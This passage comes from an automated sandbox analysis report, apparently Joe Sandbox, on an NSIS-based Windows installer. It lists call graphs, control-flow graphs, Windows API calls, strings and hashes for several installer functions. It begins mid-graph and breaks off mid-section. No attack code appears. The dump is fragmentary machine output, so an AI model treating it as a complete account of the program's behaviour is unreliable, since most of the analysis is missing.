405a8f 4041->4046 4050 40141d 80 API calls 4042->4050 4048 405b9c 4043->4048 4049 405b45 SystemParametersInfoW CreateWindowExW 4043->4049 4051 405a56 4044->4051 4045->4046 4052 405a79 GetFileAttributesW 4045->4052 4054 40674e 3 API calls 4046->4054 4048->3935 4049->4042 4055 405b98 4050->4055 4051->4041 4056 405a85 4052->4056 4053 405ac8 4053->4040 4057 405a95 4054->4057 4055->4048 4058 403ec1 19 API calls 4055->4058 4056->4046 4059 40677d 2 API calls 4056->4059 4139 406035 lstrcpynW 4057->4139 4061 405ba9 4058->4061 4059->4046 4062 405bb5 ShowWindow LoadLibraryW 4061->4062 4063 405c38 4061->4063 4064 405bd4 LoadLibraryW 4062->4064 4065 405bdb GetClassInfoW 4062->4065 4066 405073 83 API calls 4063->4066 4064->4065 4067 405c05 DialogBoxParamW 4065->4067 4068 405bef GetClassInfoW RegisterClassW 4065->4068 4069 405c3e 4066->4069 4072 40141d 80 API calls 4067->4072 4068->4067 4070 405c42 4069->4070 4071 405c5a 4069->4071 4070->4048 4074 40141d 80 API calls 4070->4074 4073 40141d 80 API calls 4071->4073 4072->4048 4073->4048 4074->4048 4076 40389d 4075->4076 4077 40388f CloseHandle 4075->4077 4147 403caf 4076->4147 4077->4076 4082->3917 4200 406035 lstrcpynW 4083->4200 4085 4067bb 4086 405d85 4 API calls 4085->4086 4087 4067c1 4086->4087 4088 406064 5 API calls 4087->4088 4095 403ac3 4087->4095 4091 4067d1 4088->4091 4089 406809 lstrlenW 4090 406810 4089->4090 4089->4091 4093 40674e 3 API calls 4090->4093 4091->4089 4092 406301 2 API calls 4091->4092 4091->4095 4096 40677d 2 API calls 4091->4096 4092->4091 4094 406816 GetFileAttributesW 4093->4094 4094->4095 4095->3928 4097 406035 lstrcpynW 4095->4097 4096->4089 4097->3961 4098->3966 4099->3950 4100->3958 4101->3977 4103 405ca6 4102->4103 4104 405c9a CloseHandle 4102->4104 4103->3977 4104->4103 4105->3992 4106->3994 4108 40678c 4107->4108 4109 406792 CharPrevW 4108->4109 4110 40361f 4108->4110 4109->4108 4109->4110 4111 406035 lstrcpynW 4110->4111 4111->3998 4113 4032f3 4112->4113 4114 4032db 4112->4114 4117 403303 GetTickCount 4113->4117 4118 4032fb 4113->4118 4115 4032e4 DestroyWindow 4114->4115 4116 4032eb 4114->4116 4115->4116 4116->4001 4120 403311 CreateDialogParamW ShowWindow 4117->4120 4121 403334 4117->4121 4125 40635e 4118->4125 4120->4121 4121->4001 4123->4007 4124->4008 4126 40637b PeekMessageW 4125->4126 4127 406371 DispatchMessageW 4126->4127 4128 403301 4126->4128 4127->4126 4128->4001 4130 403ed5 4129->4130 4145 405f7d wsprintfW 4130->4145 4132 403f49 4133 406831 18 API calls 4132->4133 4134 403f55 SetWindowTextW 4133->4134 4135 403f70 4134->4135 4136 403f8b 4135->4136 4137 406831 18 API calls 4135->4137 4136->4031 4137->4135 4138->4027 4139->4033 4146 406035 lstrcpynW 4140->4146 4142 403eb4 4143 40674e 3 API calls 4142->4143 4144 403eba lstrcatW 4143->4144 4144->4053 4145->4132 4146->4142 4148 403cbd 4147->4148 4149 4038a2 4148->4149 4150 403cc2 FreeLibrary GlobalFree 4148->4150 4151 406cc7 4149->4151 4150->4149 4150->4150 4152 4067aa 18 API calls 4151->4152 4153 406cda 4152->4153 4154 406ce3 DeleteFileW 4153->4154 4155 406cfa 4153->4155 4194 4038ae CoUninitialize 4154->4194 4156 406e77 4155->4156 4198 406035 lstrcpynW 4155->4198 4162 406301 2 API calls 4156->4162 4182 406e84 4156->4182 4156->4194 4158 406d25 4159 406d39 4158->4159 4160 406d2f lstrcatW 4158->4160 4163 40677d 2 API calls 4159->4163 4161 406d3f 4160->4161 4165 406d4f lstrcatW 4161->4165 4167 406d57 lstrlenW FindFirstFileW 4161->4167 4164 406e90 4162->4164 4163->4161 4168 40674e 3 API calls 4164->4168 4164->4194 4165->4167 4166 4062cf 11 API calls 4166->4194 4171 406e67 4167->4171 4195 406d7e 4167->4195 4169 406e9a 4168->4169 4172 4062cf 11 API calls 4169->4172 4170 405d32 CharNextW 4170->4195 4171->4156 4173 406ea5 4172->4173 4174 405e5c 2 API calls 4173->4174 4175 406ead RemoveDirectoryW 4174->4175 4179 406ef0 4175->4179 4180 406eb9 4175->4180 4176 406e44 FindNextFileW 4178 406e5c FindClose 4176->4178 4176->4195 4178->4171 4181 404f9e 25 API calls 4179->4181 4180->4182 4183 406ebf 4180->4183 4181->4194 4182->4166 4185 4062cf 11 API calls 4183->4185 4184 4062cf 11 API calls 4184->4195 4186 406ec9 4185->4186 4189 404f9e 25 API calls 4186->4189 4187 406cc7 72 API calls 4187->4195 4188 405e5c 2 API calls 4190 406dfa DeleteFileW 4188->4190 4191 406ed3 4189->4191 4190->4195 4192 406c94 42 API calls 4191->4192 4192->4194 4193 404f9e 25 API calls 4193->4176 4194->3936 4194->3937 4195->4170 4195->4176 4195->4184 4195->4187 4195->4188 4195->4193 4196 404f9e 25 API calls 4195->4196 4197 406c94 42 API calls 4195->4197 4199 406035 lstrcpynW 4195->4199 4196->4195 4197->4195 4198->4158 4199->4195 4200->4085 4956 401cb2 4957 40145c 18 API calls 4956->4957 4958 401c54 4957->4958 4959 4062cf 11 API calls 4958->4959 4960 401c64 4958->4960 4961 401c59 4959->4961 4962 406cc7 81 API calls 4961->4962 4962->4960 3706 4021b5 3707 40145c 18 API calls 3706->3707 3708 4021bb 3707->3708 3709 40145c 18 API calls 3708->3709 3710 4021c4 3709->3710 3711 40145c 18 API calls 3710->3711 3712 4021cd 3711->3712 3713 40145c 18 API calls 3712->3713 3714 4021d6 3713->3714 3715 404f9e 25 API calls 3714->3715 3716 4021e2 ShellExecuteW 3715->3716 3717 40221b 3716->3717 3718 40220d 3716->3718 3719 4062cf 11 API calls 3717->3719 3720 4062cf 11 API calls 3718->3720 3721 402230 3719->3721 3720->3717 4963 402238 4964 40145c 18 API calls 4963->4964 4965 40223e 4964->4965 4966 4062cf 11 API calls 4965->4966 4967 40224b 4966->4967 4968 404f9e 25 API calls 4967->4968 4969 402255 4968->4969 4970 405c6b 2 API calls 4969->4970 4971 40225b 4970->4971 4972 4062cf 11 API calls 4971->4972 4980 4022ac CloseHandle 4971->4980 4977 40226d 4972->4977 4974 4030e3 4975 402283 WaitForSingleObject 4976 402291 GetExitCodeProcess 4975->4976 4975->4977 4979 4022a3 4976->4979 4976->4980 4977->4975 4978 40635e 2 API calls 4977->4978 4977->4980 4978->4975 4982 405f7d wsprintfW 4979->4982 4980->4974 4982->4980 3782 401eb9 3783 401f24 3782->3783 3786 401ec6 3782->3786 3784 401f53 GlobalAlloc 3783->3784 3788 401f28 3783->3788 3790 406831 18 API calls 3784->3790 3785 401ed5 3789 4062cf 11 API calls 3785->3789 3786->3785 3792 401ef7 3786->3792 3787 401f36 3806 406035 lstrcpynW 3787->3806 3788->3787 3791 4062cf 11 API calls 3788->3791 3801 401ee2 3789->3801 3794 401f46 3790->3794 3791->3787 3804 406035 lstrcpynW 3792->3804 3796 402708 3794->3796 3797 402387 GlobalFree 3794->3797 3797->3796 3798 401f06 3805 406035 lstrcpynW 3798->3805 3799 406831 18 API calls 3799->3801 3801->3796 3801->3799 3802 401f15 3807 406035 lstrcpynW 3802->3807 3804->3798 3805->3802 3806->3794 3807->3796 4983 404039 4984 404096 4983->4984 4985 404046 lstrcpynA lstrlenA 4983->4985 4985->4984 4986 404077 4985->4986 4986->4984 4987 404083 GlobalFree 4986->4987 4987->4984

                                                                                                                                        Executed Functions

                                                                                                                                        Function 004050F9 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 295windowclipboardmemoryCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 0 4050f9-405114 1 4052c1-4052c8 0->1 2 40511a-405201 GetDlgItem * 3 call 403dc4 call 4044a2 call 406831 call 4062cf GetClientRect GetSystemMetrics SendMessageW * 2 0->2 3 4052f2-4052ff 1->3 4 4052ca-4052ec GetDlgItem CreateThread CloseHandle 1->4 35 405203-40521d SendMessageW * 2 2->35 36 40521f-405222 2->36 6 405320-405327 3->6 7 405301-40530a 3->7 4->3 11 405329-40532f 6->11 12 40537e-405382 6->12 9 405342-40534b call 403df6 7->9 10 40530c-40531b ShowWindow * 2 call 403dc4 7->10 22 405350-405354 9->22 10->6 16 405331-40533d call 403d44 11->16 17 405357-405367 ShowWindow 11->17 12->9 14 405384-405387 12->14 14->9 20 405389-40539c SendMessageW 14->20 16->9 23 405377-405379 call 403d44 17->23 24 405369-405372 call 404f9e 17->24 29 4053a2-4053c3 CreatePopupMenu call 406831 AppendMenuW 20->29 30 4052ba-4052bc 20->30 23->12 24->23 37 4053c5-4053d6 GetWindowRect 29->37 38 4053d8-4053de 29->38 30->22 35->36 39 405232-405249 call 403d6b 36->39 40 405224-405230 SendMessageW 36->40 41 4053df-4053f7 TrackPopupMenu 37->41 38->41 46 40524b-40525f ShowWindow 39->46 47 40527f-4052a0 GetDlgItem SendMessageW 39->47 40->39 41->30 43 4053fd-405414 41->43 45 405419-405434 SendMessageW 43->45 45->45 48 405436-405459 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 45->48 49 405261-40526c ShowWindow 46->49 50 40526e 46->50 47->30 51 4052a2-4052b8 SendMessageW * 2 47->51 52 40545b-405484 SendMessageW 48->52 54 405274-40527a call 403dc4 49->54 50->54 51->30 52->52 53 405486-4054a0 GlobalUnlock SetClipboardData CloseClipboard 52->53 53->30 54->47
                                                                                                                                        APIs
                                                                                                                                        • GetDlgItem.USER32(?,00000403), ref: 0040515B
                                                                                                                                        • GetDlgItem.USER32(?,000003EE), ref: 0040516A
                                                                                                                                        • GetClientRect.USER32(?,?), ref: 004051C2
                                                                                                                                        • GetSystemMetrics.USER32(00000015), ref: 004051CA
                                                                                                                                        • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051EB
                                                                                                                                        • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051FC
                                                                                                                                        • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040520F
                                                                                                                                        • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040521D
                                                                                                                                        • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405230
                                                                                                                                        • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405252
                                                                                                                                        • ShowWindow.USER32(?,00000008), ref: 00405266
                                                                                                                                        • GetDlgItem.USER32(?,000003EC), ref: 00405287
                                                                                                                                        • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405297
                                                                                                                                        • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052AC
                                                                                                                                        • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052B8
                                                                                                                                        • GetDlgItem.USER32(?,000003F8), ref: 00405179
                                                                                                                                          • Part of subcall function 00403DC4: SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                                                                          • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00425976,74DF23A0,00000000), ref: 00406902
                                                                                                                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                        • GetDlgItem.USER32(?,000003EC), ref: 004052D7
                                                                                                                                        • CreateThread.KERNELBASE(00000000,00000000,Function_00005073,00000000), ref: 004052E5
                                                                                                                                        • CloseHandle.KERNELBASE(00000000), ref: 004052EC
                                                                                                                                        • ShowWindow.USER32(00000000), ref: 00405313
                                                                                                                                        • ShowWindow.USER32(?,00000008), ref: 00405318
                                                                                                                                        • ShowWindow.USER32(00000008), ref: 0040535F
                                                                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405391
                                                                                                                                        • CreatePopupMenu.USER32 ref: 004053A2
                                                                                                                                        • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053B7
                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 004053CA
                                                                                                                                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053EC
                                                                                                                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405427
                                                                                                                                        • OpenClipboard.USER32(00000000), ref: 00405437
                                                                                                                                        • EmptyClipboard.USER32 ref: 0040543D
                                                                                                                                        • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00405449
                                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00405453
                                                                                                                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405467
                                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00405489
                                                                                                                                        • SetClipboardData.USER32(0000000D,00000000), ref: 00405494
                                                                                                                                        • CloseClipboard.USER32 ref: 0040549A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1686861096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1686846008.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686875805.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.000000000050A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000517000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_appFile.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                                                                                                        • String ID: New install of "%s" to "%s"${
                                                                                                                                        • API String ID: 2110491804-1641061399
                                                                                                                                        • Opcode ID: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
                                                                                                                                        • Instruction ID: db3ff0878cedf1d1b3e6f9985675ba3e3c8e3ad145c0decdf5c07b0ce3ef5d1a
                                                                                                                                        • Opcode Fuzzy Hash: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
                                                                                                                                        • Instruction Fuzzy Hash: 46B15970900609BFEB11AFA1DD89EAE7B79FB04354F00803AFA05BA1A1C7755E81DF58
                                                                                                                                        Function 004038AF Relevance: 52.8, APIs: 22, Strings: 8, Instructions: 304filestringcomCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 202 4038af-403945 #17 SetErrorMode OleInitialize call 406328 SHGetFileInfoW call 406035 GetCommandLineW call 406035 GetModuleHandleW 209 403947-40394a 202->209 210 40394f-403963 call 405d32 CharNextW 202->210 209->210 213 4039f6-4039fc 210->213 214 403a02 213->214 215 403968-40396e 213->215 216 403a21-403a39 GetTempPathW call 4037f8 214->216 217 403970-403976 215->217 218 403978-40397c 215->218 228 403a3b-403a59 GetWindowsDirectoryW lstrcatW call 4037f8 216->228 229 403a5f-403a79 DeleteFileW call 4035b3 216->229 217->217 217->218 219 403984-403988 218->219 220 40397e-403983 218->220 222 4039e4-4039f1 call 405d32 219->222 223 40398a-403991 219->223 220->219 222->213 237 4039f3 222->237 226 403993-40399a 223->226 227 4039a6-4039b8 call 40382c 223->227 232 4039a1 226->232 233 40399c-40399f 226->233 242 4039ba-4039c1 227->242 243 4039cd-4039e2 call 40382c 227->243 228->229 240 403af8-403b07 call 403885 CoUninitialize 228->240 229->240 241 403a7b-403a81 229->241 232->227 233->227 233->232 237->213 257 403bfa-403c00 240->257 258 403b0d-403b1d call 405ccc ExitProcess 240->258 244 403ae1-403ae8 call 405958 241->244 245 403a83-403a8c call 405d32 241->245 247 4039c3-4039c6 242->247 248 4039c8 242->248 243->222 254 403a04-403a1c call 40824c call 406035 243->254 256 403aed-403af3 call 406113 244->256 260 403aa5-403aa7 245->260 247->243 247->248 248->243 254->216 256->240 262 403c02-403c1f call 406328 * 3 257->262 263 403c7d-403c85 257->263 267 403aa9-403ab3 260->267 268 403a8e-403aa0 call 40382c 260->268 293 403c21-403c23 262->293 294 403c69-403c74 ExitWindowsEx 262->294 269 403c87 263->269 270 403c8b 263->270 275 403b23-403b3d lstrcatW lstrcmpiW 267->275 276 403ab5-403ac5 call 4067aa 267->276 268->267 283 403aa2 268->283 269->270 275->240 277 403b3f-403b55 CreateDirectoryW SetCurrentDirectoryW 275->277 276->240 286 403ac7-403add call 406035 * 2 276->286 281 403b62-403b82 call 406035 * 2 277->281 282 403b57-403b5d call 406035 277->282 303 403b87-403ba3 call 406831 DeleteFileW 281->303 282->281 283->260 286->244 293->294 297 403c25-403c27 293->297 294->263 300 403c76-403c78 call 40141d 294->300 297->294 301 403c29-403c3b GetCurrentProcess 297->301 300->263 301->294 308 403c3d-403c5f 301->308 309 403be4-403bec 303->309 310 403ba5-403bb5 CopyFileW 303->310 308->294 309->303 311 403bee-403bf5 call 406c94 309->311 310->309 312 403bb7-403bd7 call 406c94 call 406831 call 405c6b 310->312 311->240 312->309 322 403bd9-403be0 CloseHandle 312->322 322->309
                                                                                                                                        APIs
                                                                                                                                        • #17.COMCTL32 ref: 004038CE
                                                                                                                                        • SetErrorMode.KERNELBASE(00008001), ref: 004038D9
                                                                                                                                        • OleInitialize.OLE32(00000000), ref: 004038E0
                                                                                                                                          • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                          • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                          • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                        • SHGetFileInfoW.SHELL32(0040A264,00000000,?,000002B4,00000000), ref: 00403908
                                                                                                                                          • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                        • GetCommandLineW.KERNEL32(00476AA0,NSIS Error), ref: 0040391D
                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,004CF0A0,00000000), ref: 00403930
                                                                                                                                        • CharNextW.USER32(00000000,004CF0A0,00000020), ref: 00403957
                                                                                                                                        • GetTempPathW.KERNEL32(00002004,004E30C8,00000000,00000020), ref: 00403A2C
                                                                                                                                        • GetWindowsDirectoryW.KERNEL32(004E30C8,00001FFF), ref: 00403A41
                                                                                                                                        • lstrcatW.KERNEL32(004E30C8,\Temp), ref: 00403A4D
                                                                                                                                        • DeleteFileW.KERNELBASE(004DF0C0), ref: 00403A64
                                                                                                                                        • CoUninitialize.COMBASE(?), ref: 00403AFD
                                                                                                                                        • ExitProcess.KERNEL32 ref: 00403B1D
                                                                                                                                        • lstrcatW.KERNEL32(004E30C8,~nsu.tmp), ref: 00403B29
                                                                                                                                        • lstrcmpiW.KERNEL32(004E30C8,004DB0B8,004E30C8,~nsu.tmp), ref: 00403B35
                                                                                                                                        • CreateDirectoryW.KERNEL32(004E30C8,00000000), ref: 00403B41
                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(004E30C8), ref: 00403B48
                                                                                                                                        • DeleteFileW.KERNEL32(0043DD40,0043DD40,?,00483008,0040A204,0047F000,?), ref: 00403B99
                                                                                                                                        • CopyFileW.KERNEL32(004EB0D8,0043DD40,00000001), ref: 00403BAD
                                                                                                                                        • CloseHandle.KERNEL32(00000000,0043DD40,0043DD40,?,0043DD40,00000000), ref: 00403BDA
                                                                                                                                        • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C30
                                                                                                                                        • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C6C
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1686861096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1686846008.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686875805.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.000000000050A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000517000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_appFile.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                                                                        • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                                                                                                                                        • API String ID: 2435955865-3712954417
                                                                                                                                        • Opcode ID: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                                                                                        • Instruction ID: 6e3717b9be2730fff72f59090edb21b77de3e5055cb75e9aafb2752c1f1d7b94
                                                                                                                                        • Opcode Fuzzy Hash: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                                                                                        • Instruction Fuzzy Hash: 1DA1E6715443117AD720BF629C4AE1B7EACAB0470AF10443FF545B62D2D7BD8A448BAE
                                                                                                                                        Function 00406301 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 825 406301-406315 FindFirstFileW 826 406322 825->826 827 406317-406320 FindClose 825->827 828 406324-406325 826->828 827->828
                                                                                                                                        APIs
                                                                                                                                        • FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1686861096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1686846008.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686875805.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.000000000050A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000517000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_appFile.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Find$CloseFileFirst
                                                                                                                                        • String ID: jF
                                                                                                                                        • API String ID: 2295610775-3349280890
                                                                                                                                        • Opcode ID: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                                                                        • Instruction ID: ae54cbf5f70e9060ab25dbcc7d0ddb8e13a77f3b50f8061b144b06f1ffcf0783
                                                                                                                                        • Opcode Fuzzy Hash: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                                                                        • Instruction Fuzzy Hash: C8D01231A141215BD7105778AD0C89B7E9CDF0A330366CA32F866F11F5D3348C2186ED
                                                                                                                                        Function 00406328 Relevance: 4.5, APIs: 3, Instructions: 18libraryloaderCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                        • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1686861096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1686846008.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686875805.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686889526.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.000000000050A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1686972296.0000000000517000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_appFile.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 310444273-0
                                                                                                                                        • Opcode ID: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                                                                        • Instruction ID: 7c6873576e710d3586a353c563cf751ff2fc1cfd2ce2d1275f1b712779c4e249
                                                                                                                                        • Opcode Fuzzy Hash: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                                                                        • Instruction Fuzzy Hash: A8D01232200111D7C7005FA5AD48A5FB77DAE95A11706843AF902F3171E734D911E6EC
                                                                                                                                        Function 004015A0 Relevance: 56.4, APIs: 15, Strings: 17, Instructions: 351sleepfilewindowCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
